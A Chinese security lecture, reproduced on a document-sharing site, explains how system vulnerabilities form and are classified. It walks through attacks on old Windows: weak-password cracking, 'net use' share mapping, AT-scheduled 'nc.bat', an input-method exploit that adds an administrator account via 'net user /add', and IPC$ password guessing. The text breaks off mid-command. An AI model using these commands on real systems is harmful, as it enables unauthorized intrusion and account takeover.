資源描述:
《系統(tǒng)安全漏洞與安全檢測(cè)》由會(huì)員上傳分享,免費(fèi)在線閱讀,更多相關(guān)內(nèi)容在教育資源-天天文庫(kù)。
1、藍(lán)盾網(wǎng)絡(luò)安全講座-----張賀勛藍(lán)盾安全小組系統(tǒng)安全漏洞與安全檢測(cè)目錄漏洞的形成漏洞的分類漏洞的檢測(cè)工具漏洞的防范辦法安全檢測(cè)的目的常見(jiàn)安全檢測(cè)的內(nèi)容專業(yè)安全檢測(cè)的內(nèi)容一、漏洞形成后門:大型軟件、系統(tǒng)的編寫,是許多程序員共同完成。他們是將一個(gè)軟件或系統(tǒng)分成若干板塊,分工編寫,然后再匯總,測(cè)試。最后,修補(bǔ),發(fā)布。在軟件匯總時(shí),為了測(cè)試方便,程序員總會(huì)留有后門;在測(cè)試以后再進(jìn)行修補(bǔ)……這些后門,如果一旦疏忽(或是為某種目的故意留下),或是沒(méi)有發(fā)現(xiàn),軟件發(fā)布后自然而然就成了漏洞。程序若干板塊之間的空隙:這里很容易出現(xiàn)連程序員的都沒(méi)想到的漏洞!藍(lán)盾安全小組網(wǎng)絡(luò)協(xié)議:網(wǎng)絡(luò)協(xié)議有TCP、UD
2、P、ICMP、IGMP等。其實(shí),他們本來(lái)的用途是好的,但卻被別人用于不乏的活動(dòng):例如,ICMP本來(lái)是用于尋找網(wǎng)絡(luò)相關(guān)信息,后來(lái)卻被用于網(wǎng)絡(luò)嗅探和攻擊;TCP本來(lái)是用于網(wǎng)絡(luò)傳輸,后來(lái)卻被用于泄漏用戶信息。程序員自身的素質(zhì):程序員的自身對(duì)網(wǎng)絡(luò)安全認(rèn)識(shí)的不夠,寫出的程序自身就有漏洞。二、系統(tǒng)漏洞的分類操作系統(tǒng)漏洞應(yīng)用平臺(tái)的漏洞應(yīng)用系統(tǒng)的漏洞網(wǎng)絡(luò)系統(tǒng)漏洞操作系統(tǒng)的漏洞弱口令弱口令就是用戶的操作密碼過(guò)于簡(jiǎn)單(如‘123’)。描述:本漏洞的危害性極強(qiáng),它可以對(duì)系統(tǒng)服務(wù)器作任何的操作。主要是因?yàn)楣芾韱T的安全意識(shí)不足。測(cè)試目的:用本漏洞控制服務(wù)器系統(tǒng)。(1)我們可以用爆力破解工具或掃描器(XSC
3、AN等)對(duì)機(jī)器進(jìn)行掃描,可得到管理員密碼。只要擁有管理員級(jí)權(quán)限,就能完全共享應(yīng)用對(duì)方的機(jī)器,如下面的命令會(huì)將對(duì)方的C盤映射為自己的X盤:c:>netusex:\[目標(biāo)主機(jī)的IP地址]c$"[密碼]"/user:"[用戶名]"其中"c$"為系統(tǒng)默認(rèn)共享,依此類推,同樣可以共享對(duì)方的"d$","e$(2)運(yùn)行AT命令。C:>netstartscheduleSchedule正在啟動(dòng)服務(wù).....Schedulw服務(wù)啟動(dòng)成功。AT的語(yǔ)法:AT[\computername][time]"command"比如:AT[\computername][time]runnc.bat(3)
4、用遠(yuǎn)程控制終端輸入法漏洞描述:輸入法漏洞可以說(shuō)是中文Windows2000推出后的第一個(gè)致命漏洞,通過(guò)它我們可以做許多的事情,包括建立用戶.測(cè)試1:使用文件類型編輯創(chuàng)建管理員用戶?:1.開(kāi)機(jī)到登陸界面調(diào)出輸入法,如全拼->幫助->操作指南,跳出輸入法指南幫助文件2.右擊"選項(xiàng)"按鈕,選擇"跳至url"3.在跳至URL上添上"c:",其它的也可.4.幫助的右邊會(huì)進(jìn)入c:5.按幫助上的"選項(xiàng)"按鈕.6.選"internet"選項(xiàng).會(huì)啟動(dòng)文件類型編輯框.7.新建一個(gè)文件類型,如一個(gè)you文件類型,在跳出的文件后綴中添上"you".確定.8.選中文件類型框中的"you"文件類型,點(diǎn)擊下
5、面的"高級(jí)按鈕",會(huì)出現(xiàn)文件操作對(duì)話框.9.新建一種文件操作,操作名任意寫,如"ppp"10.該操作執(zhí)行的命令如下:C:WINNTsystem32cmd.exe?/c?net?usermayi123456?/add?&?C:WINNTsystem32cmd.exe?/c?netlocalgroupadministratorsaboutnt/add完成后退出11.將c:的某個(gè)文件如"pipi.txt"改為"pipi.txt.mayi",然后雙擊打開(kāi)這個(gè)文件.12.通常這個(gè)文件是打不開(kāi)的,系統(tǒng)運(yùn)行一會(huì)便沒(méi)有了提示,但這時(shí)我們已經(jīng)將用戶mayi加上了,權(quán)限是管理員.13.
6、返回,重新以aboutnt用戶登錄即可。IPC$共享漏洞描述:危害性大,主要是和其它漏洞一塊使用IPC$(Inter-ProcessCommunication)共享是NT計(jì)算機(jī)上的一個(gè)標(biāo)準(zhǔn)的隱含共享,它是用于服務(wù)器之間的通信的。NT計(jì)算機(jī)通過(guò)使用這個(gè)共享來(lái)和其他的計(jì)算機(jī)連接得到不同類型的信息的。常常可利用這一點(diǎn)來(lái),通過(guò)使用空的IPC會(huì)話進(jìn)行攻擊。測(cè)試1:通過(guò)本漏洞猜測(cè)用戶密碼c:>netuse\[目標(biāo)機(jī)器的IP地址]ipc$/user:當(dāng)這個(gè)連接建立后,要將username和password送去加以確認(rèn)。如果你以"Administrator"登錄
7、,則需要進(jìn)行口令猜測(cè)。可以重復(fù)使用'net'命令,進(jìn)行username和password猜測(cè):c:>netuse\xxx.xxx.xxx.xxxipc$/user:也可以使用腳本語(yǔ)句:open(IPC,"netuse\xxx.xxx.xxx.xxxipc$/user:");看看目標(biāo)計(jì)算機(jī)上有那些共享的資源可以用下面命令:c:>netview\[目標(biāo)計(jì)算機(jī)的IP地址]一旦IPC$共享順利完成,下一個(gè)命令是:c: